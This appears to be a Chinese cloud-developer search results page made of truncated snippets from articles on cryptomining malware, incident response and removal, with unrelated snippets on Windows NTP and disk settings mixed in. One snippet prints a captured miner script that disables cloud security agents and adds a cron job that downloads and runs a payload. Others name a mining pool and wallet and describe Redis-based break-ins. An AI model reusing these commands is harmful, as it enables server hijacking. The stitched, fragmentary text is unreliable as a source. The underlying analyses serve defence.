mmbizwap/zh_CN/htmledition/style/page/appmsg_new/winwx45ba31.css"; head.appendChild(link); } })(); 云鼎实验室
2018年伴随着区块链的“疯狂” 加密货币市场也火爆起来 越来越多的新晋“矿工”加入其中 面对高昂的矿机成本和运营成本 不法黑客再出“奇招”——“云上挖矿” 通过用户云主机上的通用安全问题进行挖矿 并以其低成本...、低风险的优势迅速崛起 成为目前主流的挖矿方式之一 今天我们就为你揭开“云上挖矿”的那些秘密: ?
一、背景 近期接到客户反馈,其网络中有部分 Windows 系统终端机器异常,安全团队经过分析,发现其仍旧是一起网络挖矿事件。...2、命令解析 从run64.bat内容我们可以估计Update64.exe就是一个挖矿程序,其挖掘的是XMR虚拟货币,矿池是xmr.pool.minergate.com:45560,挖矿帐号是:cooldayright...3、MinerGate简介 MinerGate是国外一个知名的挖矿网站,支持很多种虚拟或货币的挖矿、转账交易等,其网站主页为:https://minergate.com/。...在网站上可以直观查看挖矿收益,而且支持的系统很多,目前已经支持安卓手机,适合各种人群。一句话总结,Minergate就是一款或许是最简单的入门的挖矿工具!...Claymore支持多种虚拟货币挖矿: ?
geth –port 33333 –rpc –rpcapi eth –rpcaddr 192.168.10.176 –rpcport 8888 console 2 启动ethminer(挖矿软件...127.0.0.1:1234 –opencl-device 0 –opencl-platform 1 注意:只需要执行以上两步操作,不要添加其他参数或者启动后执行miner.start()操作 -G:启动GPU挖矿...(通过opencl调用GPU挖矿) -P:geth地址 –opencl-device x :x代表启动的Gpu数量,默认全部启动 注意:启动GPU挖矿需要geth节点设置为挖矿节点才可以启动挖矿,并且geth...的disk IO速度应该足够快,否则数据同步速度不能跟上主网区块产生速度,也无法挖矿.
---- 2.技术分析:现网可行的挖矿样本 作为长期在公有云同挖矿木马对抗的我,想到dogecoin近期在具有如此大影响力的情况下,是否会促使黑灰产团队和疯狂的投机者们对公有云服务器开始疯狂挖币行为,影响公有云服务器安全和可用性呢...https://www.blockvalue.com/xinbi/201408111452.html 2.1 GPU挖矿 2.1.1 GPU挖矿:显存>4G 挖矿机型: (1)操作系统:Windows...:显存<4G 挖矿机型: (1)操作系统:Windows 64位任意版本 (2)显卡配置:显存<4G (3)挖矿软件:unmineralbe.exe (4)GPU挖矿模式:联合挖矿,核心仅调用本地GPU...(3)CPU挖矿 产币速率:平均0.006个/核/天 2.狗狗币使用GPU挖矿速率远高于CPU挖矿速率 3.矿机适用的操作系统:仅限Windows...结论 公有云狗狗币dogecoin挖矿趋势分析:由于币种Dogecoin以GPU挖矿产出为主,不会影响常规公有云linux服务器,可能会影响小部分windows服务器。
由于云主机用户一般不使用浏览器访问网页,故基于浏览器的挖矿在公有云上并非较大的威胁。...腾讯安全云鼎实验室通过对云上挖矿木马的网络、文件、进程关联分析,在日常的安全对抗中,发现了大量黑客尝试入侵挖矿的行为。...本文对云上入侵挖矿行为共性进行了统计分析,帮助用户对挖矿行为进行防御,从而更好地保障腾讯云用户安全。 币种分析(挖矿目标分析) 对于云上挖矿,首要的话题是黑客入侵挖矿的目标,即挖矿币种。...矿池分析 对黑客的挖矿方式进一步分析发现,云上黑客入侵挖矿主要采用矿池挖矿的方式。...影响最大的 minerd 出自 https://github.com/pooler/cpuminer;Windows上的 cpuminer-multi.exe 矿机源于 https://github.com
Sysdig 的研究人员发现了一种新的云原生挖矿攻击行动,并将其命名为 AMBERSQUID。...AMBERSQUID 攻击云服务但不会触发 AWS 申请更多资源的请求,与向 EC2 实例发送垃圾邮件类似。...只有当容器运行时,才能够发现服务中的挖矿进程。2023 年的云威胁报告也指出,仅使用静态扫描会漏掉大概 10% 的恶意镜像。...在创建自己的存储库前,攻击者从流行的 GitHub 存储库下载了挖矿程序,并将其导入到 Docker 镜像中,这使得攻击者的操作更加隐蔽。攻击者的存储库中没有源代码,但提供了用于下载的挖矿程序。...在构建的配置文件中,插入了执行挖矿程序的命令。
遇到一台机器偶尔cpu使用率达到80%,触发告警。登录查看后一个sshd2程序导致cpu负载高
腾讯云windows镜像2021年上半年优化过一次,其中有ntp相关的一些参数优化针对老机器时间误差的问题,解决方案如下:以管理员身份运行首先执行reg query命令查看当前配置reg query HKLM...\W32Time\TimeProviders\NtpClient | findstr "PollInterval"组策略NTP客户端配置里的Type要着重注意下计算机配置 → 管理模板 → 系统 → Windows...时间服务 → 时间提供程序 → 配置Windows NTP 客户端图片.pngNTP同步出错的问题,注意检查下这里是不是NTP类型,如果不是改成NTP类型,并重启windows time服务图片.png...resyncstart-sleep 3w32tm /resyncimage.pngSpecialPollInterval ∈ 【2^MinPollInterval,2^MaxPollInterval】腾讯云平台目前的默认值是...^6,2^10】,我调成60 ∈ 【2^5,2^10】了,1分钟校时1次,过去的太乱了我半年前做了一次统计现在找不到了,印象中有3600(1小时),有604800(7天),乱得很,现在是300秒,阿里云也是
update server http://windows-1251783334.cos.ap-shanghai.myqcloud.com/115.159.148.149/windows_update.vbs...(原出处的内容可能更新,建议以原出处为准) 该脚本来自微软,原出处:https://learn.microsoft.com/zh-cn/windows/win32/wua_sdk/searching-...-downloading--and-installing-updates 主要用于实现windows自动更新功能。...在windows机器内直接执行该脚本文件即可,不需要输入任何参数 RebootToComplete以实现更新后重启机器使得更新生效 脚本执行指令如下:cscript windows_update.vbs.../RebootToComplete 注意: (1)必须确保机器可以正常连接windows更新服务器或自定义的相关更新服务器,否则无法实现更新 (2)该脚本执行结束后,机器会重启以保证补丁生效 (3)
以下4段命令在cmd命令行下执行,能看到云盘的情况(本地盘看不到)顺序从小到大假如总共5块硬盘,1个云盘系统盘,4个云盘数据盘用读取注册表信息的方法获取4块数据盘的信息reg query "HKEY_LOCAL_MACHINE...totalsectors^,partitions^ /value > diskinfo.txtnotepad diskinfo.txt执行后会显示indexIndex=0代表系统盘Index=1代表第1块云盘数据盘...Index=2代表第2块云盘数据盘Index=3代表第3块云盘数据盘Index=4代表第4块云盘数据盘
分析样本 要求 确定二进制文件类型 给出钱包地址的 IOC 特征 文件类型:PE64 脱壳 upx.exe -d svhostd.jpg.virus 钱包地址的 IOC 特征 云沙箱自动分析
本篇是第二期,讲述了国内某高端制造厂商遭遇云上在野容器攻击,和腾讯安全并肩作战,击退挖矿黑产组织的故事。图片9月14日,午后。阳光透过棕黄色的椴树叶,一缕缕撒在湖面上,泛出了碎金子的光。...图片S公司有上万台云主机,对挖矿组织来说是不可多得的肥羊。如果能逃逸到主机拿下最高权限,就可以利用更大的算力进行挖矿。不仅如此,他还可以以主机为跳板,在内网进行横向扩散,猎取S公司的核心机密数据。...但是,Eric不敢确定其他节点上是否也被植入了挖矿木马,他的神经紧绷着。S公司是国内知名的高端制造企业,也是行业内最早进行数字化转型的企业之一,在前几年就开始探索云原生技术和业务容器化。...原来,在9月14日X团伙的新挖矿样本刚发出,腾讯云鼎实验室的哨兵系统就在第一时间捕获,并进行了详细的分析。这个攻击案件的各种细节和哨兵系统捕获的样本一一吻合。...在容器运行时,腾讯云容器安全也能够自适应识别黑客攻击,实时监控和防护容器运行时安全。晚上8点10分,S公司在企业微信群里反馈漏洞已修复,并且采购了全量的腾讯云容器安全产品。
攻击者通过各种手段将挖矿程序植入受害者的计算机中,在受害者不知情的情况下利用其计算机的云算力进行挖矿,从而获取利益,这类非法植入用户计算机的挖矿程序就是挖矿木马。 挖矿木马,挖的是啥?...通常情况下,无文件挖矿仅通过结束进程是无法完全清除的,系统中可能残留恶意的计划任务: 或是恶意的WMI,需要全部进行删除才能彻底清除木马: Fonts目录隐藏挖矿木马 C:\Windows\Fonts...目录是Windows系统下用于存放字体文件的目录,有一些病毒会将自身的程序隐藏在该目录下,例如Explorer一键挖矿,正常使用资源管理器在Fonts目录下无法查看到木马文件,需要借助PCHunter工具查看...SYSTEM\CurrentControlSet\services\hy5.5 并为母体1sass.exe添加注册表自启动: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows...联动防御——深信服安全云脑 打造云网端一体的联动防御体系,通过海量数据汇聚,在安全能力上结合大数据、人工智能、多引擎、云计算等核心技术构建全局的安全能力中心。
这两天使用的公网服务器被入侵了,而且感染了不止一种病毒:一种是 libudev.so,是 DDoS 的客户端,现象就是不停的向外网发包,也就是超目标发起 DDoS 攻击;另外一种是挖矿程序,除了发包之外...XMR 挖矿程序 2.1 病毒特征 第二种病毒是门罗币(XMR)挖矿程序,门罗币似乎是今年年初涨得很快,所以用病毒入侵挖矿的手法也就出现了,病毒主要是通过下载脚本,运行后下载并启动挖矿程序来工作,脚本的内容如下...,关于脚本的代码分析见于:XMR恶意挖矿案例简析,里面讲的非常详细。...参考资料 XMR恶意挖矿案例简析 金山云安珀实验室千里追踪75万台“肉鸡”控制源 记一次排除十字符libudev.so病毒的过程 FreeBuf 发布者:全栈程序员栈长,转载请注明出处:https://
今天上服务器一查看cpu被占满了,使用了top命令一看,好家伙看到 kthreaddi 进程占用cpu300% 老子气坏了,没碰见过,什么是kthreaddi 白百度了一圈,原来【 kthreaddi 】是挖矿病毒...果然有一条定时任务,更加可气的是找不到这个文件 解决办法:删除这条命名,然后又top命名 kill -9 PID 杀死进程 貌似解决了问题 但是过一会 又创建了进程,定时任务又被重新写入了 这次我就查看挖矿进程的执行文件链接
攻击者通过Redis未授权访问,写入定时任务,执行挖矿程序。...tmp/conn /tmp/conn: PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced 首先下载了一个图片,然后通过dd提取出来挖矿程序...这种通过Redis未授权拿服务器挖矿的情况很常见。 处理过程 1)redis增加认证,清空/var/spool/cron/root和authorized_keys。
背景 日常应急响应过程中发现的挖矿脚本,对其进行分析发现写的质量该不错,可以学习下 样本分析及学习 SHELL=/bin/bash PATH=/sbin:/bin:/usr/sbin:/usr/bin...var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down #卸载阿里云的安骑士...监控 service bcm-agent stop yum remove bcm-agent -y apt-get remove bcm-agent -y #干掉腾讯云的云镜 elif ps.../tmp/xms,并以bash来执行下载的挖矿样本。...之后再删除下载的挖矿样本/tmp/xms echo -e "*/1 * * * * root (curl -fsSL $url/xms||wget -q -O- $url/xms||python -c
通过文件夹的创立时间快速推断出如何被感染 last登陆时间 last登陆失败的时间爆破的ip来定位出第一个中毒主机; –修复漏洞、清理后门、(关门,打狗) 6、防护策略-避免再犯同样问题–安全建议 IPtable吧挖矿常见端口全切断
而该269 进程则是挖矿病毒进行高度伪装,即使是kill 掉该进程也无济于事,后面又会自动跑起来。...58 root rt 0 0 0 0 S 0.0 0.0 0:00.00 migration/8 常规做法 针对该挖矿病毒...,一般常规做法是 1、查找出具体哪个进程导致占比CPU;比如269; 2、kill 掉该挖矿进程;sudo kill -9 48124; 3、通过关键词查找挖矿病毒,一般在/tmp 目录底下,如果不清楚查找...说明挖矿病毒是通过早期开放的外网22号端口进行入侵,然后别人用爆破的方式通过22端口植入病毒,root等账号密码被破解。.../agent_installer.sh 5、执行完成,终端的agent程序将自动连接EDR管理中心 通过云查杀病毒 口令检测 SSH策略检测 身份鉴别策略组检测 对一些已感染的文件进行隔离病毒
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
即时通信 IM
ICP备案
对象存储
实时音视频
